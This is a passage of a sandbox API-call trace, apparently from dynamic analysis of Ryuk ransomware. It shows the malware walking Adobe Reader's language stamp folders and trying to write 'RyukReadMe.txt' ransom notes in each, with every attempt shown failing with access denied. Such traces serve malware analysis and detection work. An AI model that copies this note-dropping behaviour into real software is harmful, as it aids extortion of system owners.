(dwErrCode=0x0) [0138.778] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.778] GetLastError () returned 0x5 [0138.778] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.778] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.778] SetLastError (dwErrCode=0x0) [0138.778] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.779] GetLastError () returned 0x5 [0138.779] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.779] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.780] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.780] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.782] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.782] SetLastError (dwErrCode=0x0) [0138.782] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.785] GetLastError () returned 0x5 [0138.785] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.785] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.785] SetLastError (dwErrCode=0x0) [0138.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.785] GetLastError () returned 0x5 [0138.785] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.785] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.785] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.785] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.786] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.786] SetLastError (dwErrCode=0x0) [0138.786] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.786] GetLastError () returned 0x5 [0138.787] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.787] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.787] SetLastError (dwErrCode=0x0) [0138.787] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.787] GetLastError () returned 0x5 [0138.787] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.787] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.788] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.788] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.788] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.788] SetLastError (dwErrCode=0x0) [0138.788] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.788] GetLastError () returned 0x5 [0138.788] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.788] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.788] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.788] SetLastError (dwErrCode=0x0) [0138.788] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.788] GetLastError () returned 0x5 [0138.788] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.788] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.789] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.789] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.789] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.790] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.790] SetLastError (dwErrCode=0x0) [0138.790] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.790] GetLastError () returned 0x5 [0138.790] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.790] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.790] SetLastError (dwErrCode=0x0) [0138.790] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.790] GetLastError () returned 0x5 [0138.790] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.790] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.790] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.790] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.791] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.791] SetLastError (dwErrCode=0x0) [0138.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.791] GetLastError () returned 0x5 [0138.791] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.791] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.791] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.791] SetLastError (dwErrCode=0x0) [0138.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.792] GetLastError () returned 0x5 [0138.792] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.792] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.793] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.793] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.794] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.795] SetLastError (dwErrCode=0x0) [0138.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.797] GetLastError () returned 0x5 [0138.797] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.797] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.797] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.797] SetLastError (dwErrCode=0x0) [0138.797] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.798] GetLastError () returned 0x5 [0138.798] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.798] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.798] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.798] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.798] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.799] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.799] SetLastError (dwErrCode=0x0) [0138.799] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.799] GetLastError () returned 0x5 [0138.799] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.799] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.799] SetLastError (dwErrCode=0x0) [0138.799] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.799] GetLastError () returned 0x5 [0138.799] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.799] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.801] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.801] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.802] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.803] SetLastError (dwErrCode=0x0) [0138.803] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.805] GetLastError () returned 0x5 [0138.805] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.805] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.805] SetLastError (dwErrCode=0x0) [0138.805] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.805] GetLastError () returned 0x5 [0138.805] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.806] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.807] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.807] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.808] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.809] SetLastError (dwErrCode=0x0) [0138.809] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.812] GetLastError () returned 0x5 [0138.812] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.812] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.812] SetLastError (dwErrCode=0x0) [0138.812] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.812] GetLastError () returned 0x5 [0138.812] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.812] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.813] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.813] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.813] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.813] SetLastError (dwErrCode=0x0) [0138.813] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.813] GetLastError () returned 0x5 [0138.813] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.813] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.813] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.813] SetLastError (dwErrCode=0x0) [0138.813] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.813] GetLastError () returned 0x5 [0138.814] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.814] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.814] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.814] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.815] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.815] SetLastError (dwErrCode=0x0) [0138.815] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.815] GetLastError () returned 0x5 [0138.815] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.815] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.815] SetLastError (dwErrCode=0x0) [0138.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 